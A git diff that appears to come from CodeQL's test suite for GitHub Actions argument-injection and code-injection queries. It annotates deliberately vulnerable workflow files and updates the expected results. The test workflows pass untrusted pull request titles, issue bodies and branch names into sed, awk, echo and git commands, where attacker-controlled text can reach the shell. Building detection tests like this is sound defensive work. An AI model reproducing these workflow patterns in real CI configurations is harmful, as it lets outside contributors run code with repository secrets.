VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | 
@@ -20,16 +33,3 @@ nodes | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths -#select -| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref index a2f6e1c12b9..3475e69cd3a 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-088/ArgumentInjectionCritical.ql +query: experimental/Security/CWE-088/ArgumentInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected index 12171d8c7f2..981e5b86549 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected 
@@ -1,3 +1,4 @@ +#select edges | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | @@ -20,4 +21,3 @@ nodes | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref index b96467552c5..3aa94b52965 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-088/ArgumentInjectionMedium.ql +query: experimental/Security/CWE-088/ArgumentInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml index ba7d3eec1af..bed01ffea54 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml 
@@ -4,4 +4,4 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml index 510ad86cbfa..f4a9d457452 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml @@ -6,4 +6,4 @@ runs: - shell: bash env: FOO: ${{ secrets.FOO}} - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml index ba7d3eec1af..6c63aa58afa 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml @@ -4,4 +4,4 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml index 53a2e0c87e2..75a02958a99 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml 
@@ -16,7 +16,7 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.issue.body }}' + run: echo '${{ github.event.issue.body }}' # $ Alert[actions/code-injection/critical] - name: Step id: step env: @@ -25,10 +25,10 @@ runs: run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT - id: step2 env: - FOO2: ${{ github.event.issue.body }} + FOO2: ${{ github.event.issue.body }} # $ Source[actions/code-injection/critical] shell: bash run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT - name: Sink id: sink shell: bash - run: echo "${{ inputs.taint }}" + run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml index 0048a4ca31e..25b58d07466 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml @@ -213,7 +213,7 @@ runs: run: | git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}" - git pull origin ${{ github.head_ref || github.ref }} + git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/critical] git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml index 8bffcdc4020..0a37ade5da6 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml 
@@ -74,7 +74,7 @@ runs: # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli run: | packages="ultralytics-actions" - if [ "${{ inputs.spelling }}" = "true" ]; then + if [ "${{ inputs.spelling }}" = "true" ]; then # $ Alert[actions/code-injection/medium] packages="$packages codespell tomli" fi @@ -211,10 +211,10 @@ runs: - name: Commit and Push Changes if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' run: | - git config --global user.name "${{ inputs.github_username }}" - git config --global user.email "${{ inputs.github_email }}" + git config --global user.name "${{ inputs.github_username }}" # $ Alert[actions/code-injection/medium] + git config --global user.email "${{ inputs.github_email }}" # $ Alert[actions/code-injection/medium] # this action is not called in the test - git pull origin ${{ github.head_ref || github.ref }} + git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/medium] git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml index 398c0ee6a6e..cd9dcaf1a0b 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml @@ -19,7 +19,7 @@ runs: using: composite steps: - shell: bash - run: echo "${{ inputs.title }}" + run: echo "${{ inputs.title }}" # $ Alert[actions/code-injection/critical] - uses: frabert/replace-string-action@v2.5 id: out with: 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml index a8019fbbf14..85decb59932 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml @@ -93,7 +93,7 @@ runs: shell: bash - shell: bash run: | - echo "${{ inputs.body }}" + echo "${{ inputs.body }}" # $ Alert[actions/code-injection/critical] # Checkout Repository ---------------------------------------------------------------------------------------------- - name: Checkout Repository @@ -220,7 +220,7 @@ runs: run: | git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}" - git pull origin ${{ github.head_ref || github.ref }} + git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/critical] git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml index 7b9c5735488..301be58e2e8 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml @@ -14,7 +14,7 @@ jobs: - uses: actions/checkout@v2 - name: Remove conflicting chars env: - ISSUE_TITLE: ${{github.event.issue.title}} + ISSUE_TITLE: ${{github.event.issue.title}} # $ Source[actions/code-injection/critical] uses: frabert/replace-string-action@1.2 id: remove_quotations with: 
@@ -24,6 +24,6 @@ jobs: - name: Check info id: check-info run: | - echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV + echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml index 5cf7bbd4e6b..c4add3b215e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml @@ -17,12 +17,12 @@ jobs: workflow: ${{ github.event.workflow_run.workflow_id }} name: pr - - name: save PR id + - name: save PR id # $ Source[actions/code-injection/critical] id: pr run: echo "::set-output name=id::$(> $GITHUB_OUTPUT - - run: echo ${{ steps.prepare.outputs.pr }} + - run: echo ${{ steps.prepare.outputs.pr }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml index 63acdc612b0..2d1acd97b2d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml @@ -14,9 +14,9 @@ jobs: name: artifact # Save PR id to output - - name: Save artifact data + - name: Save artifact data # $ Source[actions/code-injection/critical] id: artifact run: echo "::set-output name=id::$(> $GITHUB_ENV + echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV # $ Alert[actions/code-injection/medium] #If a target branch was found will run the action - if: env.destination_branch != 'invalid' 
@@ -50,7 +50,7 @@ jobs: git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} git cherry-pick -x ${{github.event.after}} --strategy-option theirs git push -u origin ${{env.auto_branch}} - hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" + hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" # $ Alert[actions/code-injection/medium] env: #Token used for the pull request. Corresponds to the DynamoBot account GITHUB_TOKEN: ${{secrets.DYNAMOBOTTOKEN}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml index fdb140ec380..d07398ebca7 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml @@ -4,5 +4,5 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.discussion.title }}' - - run: echo '${{ github.event.discussion.body }}' \ No newline at end of file + - run: echo '${{ github.event.discussion.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.discussion.body }}' # $ Alert[actions/code-injection/critical] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml index 649d3a6e131..5cdf5c0bf62 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml 
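Review bot: The rewritten last line of discussion.yml still carries `\ No newline at end of file` on the `+` side; since the line is being rewritten anyway, terminating it with a newline would drop the marker and the no-newline churn on every later edit. The same applies to the final `- run:` line of discussion_comment.yml in the following hunk.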
@@ -4,6 +4,6 @@ jobs:
 echo-chamber:
 runs-on: ubuntu-latest
 steps:
- - run: echo '${{ github.event.discussion.title }}'
- - run: echo '${{ github.event.discussion.body }}'
- - run: echo '${{ github.event.comment.body }}'
\ No newline at end of file
+ - run: echo '${{ github.event.discussion.title }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.discussion.body }}' # $ Alert[actions/code-injection/critical]
+ - run: echo '${{ github.event.comment.body }}' # $ Alert[actions/code-injection/critical]
\ No newline at end of file
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml
index b4c2ecaec70..0da70f8e2d4 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml
@@ -81,7 +81,7 @@ jobs:
 git push \
 "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \
- 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'
+ 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}' # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical]
 env:
 BOT_PA_TOKEN: ${{ secrets.githubBotPAT }}
@@ -91,4 +91,4 @@ jobs:
 with:
 github-token: ${{ secrets.githubBotPAT }}
 script: |
- const fileList = `${{ steps.git-commit.outputs.file-list }}`
+ const fileList = `${{ steps.git-commit.outputs.file-list }}` # $ Alert[actions/code-injection/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml
index 0c4aa93c7a5..333af0376ca 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml
@@ -33,7 +33,7 @@ jobs:
 next_version: next
 link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})'
 steps:
- - run: echo "${{ inputs.taint }}"
+ - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical]
 - uses: actions/checkout@v3
 with:
 ref: ${{ github.event.pull_request.head.ref }}
@@ -41,8 +41,8 @@ jobs:
 id: update
 uses: actions/github-script@v6
 env:
- log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n'
- prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n'
+ log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical]
